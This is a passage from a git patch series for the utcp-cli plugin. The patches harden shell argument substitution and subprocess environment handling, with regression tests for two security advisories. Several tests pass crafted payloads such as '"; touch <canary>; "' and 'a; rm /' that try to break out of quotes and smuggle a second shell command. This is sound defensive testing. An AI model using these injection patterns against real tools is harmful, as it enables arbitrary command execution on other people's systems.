monkeypatch.setenv("AWS_PROFILE", "prod") - # NOT requested: monkeypatch.setenv("DATABASE_URL", "postgres://...") provider = CliCallTemplate( @@ -206,8 +291,6 @@ def test_env_vars_override_inherit_env_vars(self, transport, monkeypatch): assert env["OPENAI_API_KEY"] == "explicit-override" def test_inherit_env_vars_empty_list_is_strict_mode(self, transport, monkeypatch): - # `inherit_env_vars=[]` means: nothing from host. Even PATH must - # not leak through. monkeypatch.setenv("PATH", "/usr/bin") monkeypatch.setenv("HOME", "/home/x") monkeypatch.setenv("OPENAI_API_KEY", "secret") @@ -227,12 +310,11 @@ def test_inherit_env_vars_empty_list_with_env_vars(self, transport, monkeypatch) env_vars={"FOO": "bar"}, ) env = transport._prepare_environment(provider) - # Only env_vars; default allowlist is bypassed. assert env == {"FOO": "bar"} - def test_inherit_env_vars_list_replaces_default_allowlist(self, transport, monkeypatch): - # When the caller supplies a list, the default allowlist is NOT - # merged in. They get exactly the names they asked for. + def test_inherit_env_vars_list_replaces_default_allowlist( + self, transport, monkeypatch + ): monkeypatch.setenv("PATH", "/usr/bin") monkeypatch.setenv("HOME", "/home/x") monkeypatch.setenv("OPENAI_API_KEY", "secret") @@ -244,10 +326,9 @@ def test_inherit_env_vars_list_replaces_default_allowlist(self, transport, monke env = transport._prepare_environment(provider) assert env == {"OPENAI_API_KEY": "secret"} - def test_default_inherit_env_vars_includes_path_and_home(self, transport, monkeypatch): - # `inherit_env_vars=None` (omitted) → default allowlist. PATH and - # at least one platform-specific home directory variable should - # be inherited so shells/binaries work. + def test_default_inherit_env_vars_includes_path_and_home( + self, transport, monkeypatch + ): monkeypatch.setenv("PATH", "/usr/bin") if os.name == "nt": monkeypatch.setenv("USERPROFILE", "C:\\Users\\x") @@ -261,20 +342,7 @@ def test_default_inherit_env_vars_includes_path_and_home(self, transport, monkey assert env["PATH"] == "/usr/bin" assert home_key in env - def test_default_inherit_env_vars_does_not_include_secrets(self, transport, monkeypatch): - for k in self.SECRET_KEYS: - monkeypatch.setenv(k, f"super-secret-{k}") - provider = CliCallTemplate(commands=[{"command": "echo hi"}]) - env = transport._prepare_environment(provider) - for k in self.SECRET_KEYS: - assert k not in env - def test_explicit_none_matches_default(self, transport, monkeypatch): - # Constructing with `inherit_env_vars=None` must produce the same - # environment as omitting the field entirely — the - # default-allowlist branch is keyed on `is None`, so don't let a - # subtle change (e.g. switching the default to `[]`) silently - # flip behavior. monkeypatch.setenv("PATH", "/usr/bin") monkeypatch.setenv("OPENAI_API_KEY", "secret") @@ -287,14 +355,10 @@ def test_explicit_none_matches_default(self, transport, monkeypatch): transport._prepare_environment(omitted) == transport._prepare_environment(explicit_none) ) - assert "PATH" in transport._prepare_environment(explicit_none) - assert "OPENAI_API_KEY" not in transport._prepare_environment(explicit_none) def test_list_replaces_default_does_not_pull_in_other_defaults( self, transport, monkeypatch ): - # Listing only PATH must not drag the rest of the default - # allowlist along (HOME / USERPROFILE / LANG / etc.). monkeypatch.setenv("PATH", "/usr/bin") monkeypatch.setenv("HOME", "/home/x") monkeypatch.setenv("USERPROFILE", "C:\\Users\\x") @@ -321,43 +385,27 @@ def test_duplicate_names_in_inherit_env_vars_are_idempotent( def test_unset_names_in_default_allowlist_are_skipped( self, transport, monkeypatch ): - # If a key in the default allowlist is not set on the host, the - # resulting env dict must simply omit it (not include `None` / - # empty string / raise). for key in transport._default_inherited_keys(): monkeypatch.delenv(key, raising=False) - # Add just one so the dict isn't empty. monkeypatch.setenv("PATH", "/usr/bin") provider = CliCallTemplate(commands=[{"command": "echo hi"}]) env = transport._prepare_environment(provider) assert env == {"PATH": "/usr/bin"} - # Specifically: never None values. for v in env.values(): assert v is not None assert isinstance(v, str) class TestInheritEnvVarsSerialization: - """Pydantic round-trip: inherit_env_vars must preserve the - None / [] / [...] distinction when a CliCallTemplate flows through - the serializer (and thus through OpenAPI / JSON manuals). - """ - def test_round_trip_preserves_none(self): - from utcp_cli.cli_call_template import CliCallTemplateSerializer - tpl = CliCallTemplate(commands=[{"command": "x"}]) d = CliCallTemplateSerializer().to_dict(tpl) - # Either omitted or explicitly null is acceptable, but it must - # not silently become `[]`. assert d.get("inherit_env_vars", None) is None rebuilt = CliCallTemplateSerializer().validate_dict(d) assert rebuilt.inherit_env_vars is None def test_round_trip_preserves_empty_list(self): - from utcp_cli.cli_call_template import CliCallTemplateSerializer - tpl = CliCallTemplate( commands=[{"command": "x"}], inherit_env_vars=[] ) @@ -367,8 +415,6 @@ def test_round_trip_preserves_empty_list(self): assert rebuilt.inherit_env_vars == [] def test_round_trip_preserves_listed_names(self): - from utcp_cli.cli_call_template import CliCallTemplateSerializer - tpl = CliCallTemplate( commands=[{"command": "x"}], inherit_env_vars=["PATH", "OPENAI_API_KEY"], @@ -380,41 +426,109 @@ def test_round_trip_preserves_listed_names(self): # --------------------------------------------------------------------------- -# End-to-end: drive the real subprocess and confirm the injection payload -# does NOT escape its placeholder. Skipped on Windows because the mock -# script + bash assumptions don't apply identically. +# End-to-end (Unix only -- bash payload assumptions). Lock down the +# regression where a placeholder INSIDE surrounding double quotes +# allowed injection in the inline-shlex.quote 1.1.2 strategy. # --------------------------------------------------------------------------- @pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") @pytest.mark.asyncio -async def test_no_command_injection_via_tool_args_unix(tmp_path): - """Run the real shell pipeline with a malicious tool_arg and confirm - the injected `touch` never runs. - """ +async def test_no_command_injection_bare_unix(tmp_path): transport = CliCommunicationProtocol() - - canary = tmp_path / "pwned" - + canary = tmp_path / "pwned-bare" script = tmp_path / "echo_arg.py" script.write_text( - "import sys\n" - "print('arg:' + sys.argv[1])\n" + "import sys\nprint('arg:' + sys.argv[1])\n" ) - call_template = CliCallTemplate( commands=[ {"command": f"{sys.executable} {script} UTCP_ARG_value_UTCP_END"} ] ) - payload = f"benign; touch {canary}" result = await transport.call_tool( None, "echo_arg", {"value": payload}, call_template ) + assert not canary.exists(), "Command injection regression (GHSA-33p6-5jxp-p3x4)" + assert "benign; touch" in str(result) + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_no_command_injection_dq_unix(tmp_path): + """The exact bypass scenario the inline shlex.quote in 1.1.2 missed: + placeholder inside surrounding double quotes with a value crafted + to close the dq early.""" + transport = CliCommunicationProtocol() + canary = tmp_path / "pwned-dq" + call_template = CliCallTemplate( + commands=[ + {"command": 'echo "URL=UTCP_ARG_id_UTCP_END"'} + ], + working_dir=str(tmp_path), + ) + payload = f'"; touch {canary}; "' + result = await transport.call_tool( + None, "echo_url", {"id": payload}, call_template + ) assert not canary.exists(), ( - "Command injection regression (GHSA-33p6-5jxp-p3x4): " - "the `; touch` payload escaped the placeholder and ran." + "Double-quote-context command injection regression " + "(GHSA-33p6-5jxp-p3x4 follow-up). The shlex.quote-in-dq bypass " + "must stay closed." ) - # The script should have observed the literal payload. - assert "benign; touch" in str(result) + assert "URL=" in str(result) + assert "touch" in str(result) + + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_no_command_injection_sq_unix(tmp_path): + transport = CliCommunicationProtocol() + canary = tmp_path / "pwned-sq" + call_template = CliCallTemplate( + commands=[ + {"command": "echo 'URL=UTCP_ARG_id_UTCP_END end'"} + ], + working_dir=str(tmp_path), + ) + payload = f"'; touch {canary}; '" + result = await transport.call_tool( + None, "echo_url", {"id": payload}, call_template + ) + assert not canary.exists() + assert "URL=" in str(result) + + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_host_secret_not_inherited_unix(monkeypatch): + """Host secret not in inherit_env_vars must not reach subprocess.""" + monkeypatch.setenv("UTCP_TEST_LEAK_PROBE", "should-not-leak") + transport = CliCommunicationProtocol() + call_template = CliCallTemplate( + commands=[ + {"command": 'echo "probe=${UTCP_TEST_LEAK_PROBE:-MISSING}"'} + ], + ) + result = await transport.call_tool( + None, "leak_probe", {}, call_template + ) + assert "probe=MISSING" in str(result) + assert "should-not-leak" not in str(result) + + +@pytest.mark.skipif(os.name == "nt", reason="bash payload assumptions") +@pytest.mark.asyncio +async def test_inherit_env_vars_opts_in_unix(monkeypatch): + monkeypatch.setenv("UTCP_TEST_LEAK_PROBE", "inherited-value") + transport = CliCommunicationProtocol() + call_template = CliCallTemplate( + commands=[ + {"command": 'echo "probe=${UTCP_TEST_LEAK_PROBE:-MISSING}"'} + ], + inherit_env_vars=["PATH", "UTCP_TEST_LEAK_PROBE"], + ) + result = await transport.call_tool( + None, "leak_probe", {}, call_template + ) + assert "probe=inherited-value" in str(result) From b00388b0078fba545c3f3e3c53c3b5a9a23d5fb3 Mon Sep 17 00:00:00 2001 From: Razvan Radulescu <43811028+h3xxit@users.noreply.github.com> Date: Sun, 10 May 2026 16:40:00 +0200 Subject: [PATCH 4/6] fix bug --- .../utcp_cli/cli_communication_protocol.py | 22 ++++++++++--- .../cli/tests/test_cli_security.py | 33 +++++++++++++++---- 2 files changed, 44 insertions(+), 11 deletions(-) diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py index d4d267c..6d2cc09 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py @@ -380,8 +380,12 @@ def _substitute_utcp_args( as a single token) powershell (Windows): - - bare: ``$env:VAR`` - - inside double quotes: ``$env:VAR`` (PS expands inside dq) + - bare: ``${env:VAR}`` + - inside double quotes: ``${env:VAR}`` (PS expands inside dq; + braced form prevents + suffix characters + from being consumed + into the var name) - inside single quotes: ValueError -- PS does not expand inside single-quoted strings, so we cannot safely @@ -524,9 +528,17 @@ def collect(name: str) -> str: f"instead." ) v = collect(m.group(1)) - # Both bare and dq accept `$env:VAR` -- PowerShell expands - # it inside double-quoted strings. - out.append(f"$env:{v}") + # Use the braced form `${env:VAR}` rather than `$env:VAR` + # so the variable name is explicitly delimited. The bare + # form lets PowerShell's lexer keep consuming + # alphanumerics + `_` until it hits a non-identifier + # char, which would silently swallow any suffix text in + # the template (e.g. template + # ``"URL=UTCP_ARG_id_UTCP_END123"`` would be substituted + # as ``"URL=$env:__UTCP_ARG__id123"`` and resolve + # an env var that does not exist). Braces close that + # boundary cleanly. + out.append("${env:" + v + "}") i = m.end() continue diff --git a/plugins/communication_protocols/cli/tests/test_cli_security.py b/plugins/communication_protocols/cli/tests/test_cli_security.py index 48ca0e9..0d3caa7 100644 --- a/plugins/communication_protocols/cli/tests/test_cli_security.py +++ b/plugins/communication_protocols/cli/tests/test_cli_security.py @@ -82,21 +82,39 @@ def test_bash_escaped_dq_does_not_flip_state(self, transport): assert cmd == f'echo "esc\\" ${{{_v("a")}}}"' @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") - def test_ps_bare_emits_env_var(self, transport): + def test_ps_bare_emits_braced_env_var(self, transport): cmd, env = transport._substitute_utcp_args( "mytool UTCP_ARG_x_UTCP_END", {"x": "a b"}, NONCE ) - assert cmd == f"mytool $env:{_v('x')}" + # Braced form so suffix chars cannot be consumed into the var + # name boundary. + assert cmd == "mytool ${env:" + _v("x") + "}" assert env[_v("x")] == "a b" @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") - def test_ps_dq_emits_env_var(self, transport): + def test_ps_dq_emits_braced_env_var(self, transport): cmd, env = transport._substitute_utcp_args( 'Write-Output "Hi UTCP_ARG_x_UTCP_END!"', {"x": "a; rm /"}, NONCE ) - assert cmd == f'Write-Output "Hi $env:{_v("x")}!"' + assert cmd == 'Write-Output "Hi ${env:' + _v("x") + '}!"' assert env[_v("x")] == "a; rm /" + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") + def test_ps_alphanumeric_suffix_does_not_extend_var_name(self, transport): + # Regression: with the bare `$env:VAR` form, an alphanumeric or + # underscore suffix in the template would be parsed as part of + # the env var name. The braced form `${env:VAR}` closes the + # boundary cleanly so the template suffix stays literal. + cmd, env = transport._substitute_utcp_args( + 'Write-Output "URL=UTCP_ARG_id_UTCP_END123suffix"', + {"id": "abc"}, + NONCE, + ) + assert cmd == ( + 'Write-Output "URL=${env:' + _v("id") + '}123suffix"' + ) + assert env[_v("id")] == "abc" + @pytest.mark.skipif(os.name != "nt", reason="PowerShell semantics") def test_ps_sq_raises_with_clear_message(self, transport): with pytest.raises(ValueError, match="single-quoted"): @@ -110,7 +128,7 @@ def test_ps_backtick_in_dq_preserved(self, transport): 'Write-Output "pre `"x`" UTCP_ARG_a_UTCP_END"', {"a": "v"}, NONCE ) # dq state must still be active when placeholder is hit. - assert cmd == f'Write-Output "pre `"x`" $env:{_v("a")}"' + assert cmd == 'Write-Output "pre `"x`" ${env:' + _v("a") + '}"' def test_multiple_placeholders_share_namespace(self, transport): cmd, env = transport._substitute_utcp_args( @@ -132,7 +150,10 @@ def test_multiple_placeholders_in_same_dq_compose(self, transport): NONCE, ) if os.name == "nt": - assert cmd == f'curl "https://api/$env:{_v("id")}/$env:{_v("action")}"' + assert cmd == ( + 'curl "https://api/${env:' + _v("id") + + '}/${env:' + _v("action") + '}"' + ) else: assert ( cmd From b8b6127d36658076e6a4a5c6699733a5c8378a8c Mon Sep 17 00:00:00 2001 From: Razvan Radulescu <43811028+h3xxit@users.noreply.github.com> Date: Sun, 10 May 2026 16:43:27 +0200 Subject: [PATCH 5/6] bump version --- plugins/communication_protocols/cli/pyproject.toml | 2 +- .../cli/src/utcp_cli/cli_call_template.py | 7 ++----- .../cli/tests/test_cli_communication_protocol.py | 1 - .../communication_protocols/cli/tests/test_cli_security.py | 2 +- 4 files changed, 4 insertions(+), 8 deletions(-) diff --git a/plugins/communication_protocols/cli/pyproject.toml b/plugins/communication_protocols/cli/pyproject.toml index 770c017..cd0aa8d 100644 --- a/plugins/communication_protocols/cli/pyproject.toml +++ b/plugins/communication_protocols/cli/pyproject.toml @@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta" [project] name = "utcp-cli" -version = "1.1.3" +version = "1.1.4" authors = [ { name = "UTCP Contributors" }, ] diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py index 1aada70..378f9dc 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_call_template.py @@ -32,10 +32,7 @@ class CommandStep(BaseModel): shell argument. Tools that previously relied on a single placeholder splitting into multiple flags (e.g. ``UTCP_ARG_flags_UTCP_END`` -> ``--verbose --debug``) must - now use one placeholder per intended flag. This change - ships with utcp-cli 1.1.3 and addresses GHSA-33p6-5jxp-p3x4 - (including the residual double-quote-context bypass that - the inline ``shlex.quote`` strategy in 1.1.2 left open). + now use one placeholder per intended flag. PowerShell limitation: a placeholder appearing inside a single-quoted PowerShell string (``'...'``) raises @@ -102,7 +99,7 @@ class CliCallTemplate(CallTemplate): Example: `echo "Previous result: $CMD_0_OUTPUT"` - **Argument Substitution (utcp-cli >= 1.1.3):** + **Argument Substitution:** ``UTCP_ARG_argname_UTCP_END`` placeholders are replaced with a context-aware shell variable reference (``"$VAR"`` outside quotes, ``${VAR}`` inside double quotes, an adjacent-quote concat trick diff --git a/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py b/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py index dec2616..f96ffa7 100644 --- a/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/tests/test_cli_communication_protocol.py @@ -490,7 +490,6 @@ async def test_env_vars_and_working_dir_combined(transport: CliCommunicationProt async def test_placeholder_substitution(): """Test that UTCP_ARG placeholders are properly substituted. - As of utcp-cli 1.1.3, substitution emits a shell-variable reference in the script and ships the actual value via env var. """ transport = CliCommunicationProtocol() diff --git a/plugins/communication_protocols/cli/tests/test_cli_security.py b/plugins/communication_protocols/cli/tests/test_cli_security.py index 0d3caa7..26c2c1c 100644 --- a/plugins/communication_protocols/cli/tests/test_cli_security.py +++ b/plugins/communication_protocols/cli/tests/test_cli_security.py @@ -7,7 +7,7 @@ - GHSA-5v57-8rxj-3p2r (CWE-526, full host environment leaked to the CLI subprocess via ``_prepare_environment``). -As of utcp-cli 1.1.3, substitution is context-aware: it tracks the +Substitution is context-aware: it tracks the surrounding quote state in the template and emits a shell variable reference (``$VAR`` / ``${VAR}`` / ``$env:VAR``) for each placeholder, then carries the actual values to the subprocess via env vars. The From 1deffbef940cbe25d03b944b4f645f63c2e9a91a Mon Sep 17 00:00:00 2001 From: Razvan Radulescu <43811028+h3xxit@users.noreply.github.com> Date: Sun, 10 May 2026 17:02:42 +0200 Subject: [PATCH 6/6] Update cli_communication_protocol.py --- .../src/utcp_cli/cli_communication_protocol.py | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py index 6d2cc09..bca07fc 100644 --- a/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py +++ b/plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py @@ -86,8 +86,15 @@ def _log_error(self, message: str): "PATH", "PATHEXT", "SYSTEMROOT", "SYSTEMDRIVE", "WINDIR", "COMSPEC", "TEMP", "TMP", "USERPROFILE", "USERNAME", "USERDOMAIN", "COMPUTERNAME", "HOMEDRIVE", "HOMEPATH", "APPDATA", "LOCALAPPDATA", "PROGRAMDATA", + "ALLUSERSPROFILE", "PUBLIC", "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMW6432", "OS", - "PROCESSOR_ARCHITECTURE", "NUMBER_OF_PROCESSORS", + "PROCESSOR_ARCHITECTURE", "PROCESSOR_IDENTIFIER", + "PROCESSOR_LEVEL", "PROCESSOR_REVISION", "NUMBER_OF_PROCESSORS", + # PowerShell + login session bits. Without PSMODULEPATH in + # particular, powershell.exe has to enumerate module roots from + # scratch on first use, which can cost 5-15s on CI runners and + # silently push the discovery flow past its timeout. + "PSMODULEPATH", "LOGONSERVER", "SESSIONNAME", "USERDNSDOMAIN", ) @classmethod @@ -255,7 +262,12 @@ async def register_manual(self, caller, manual_call_template: CallTemplate) -> R stdout, stderr, return_code = await self._execute_shell_script( shell_script, env, - timeout=30.0, + # 60s, not 30s: Windows PowerShell startup on CI + # runners can be slow (especially the first time + # in a session, before module path caches warm up). + # Discovery runs once per manual, so a generous + # ceiling here is cheap. + timeout=60.0, working_dir=manual_call_template.working_dir, )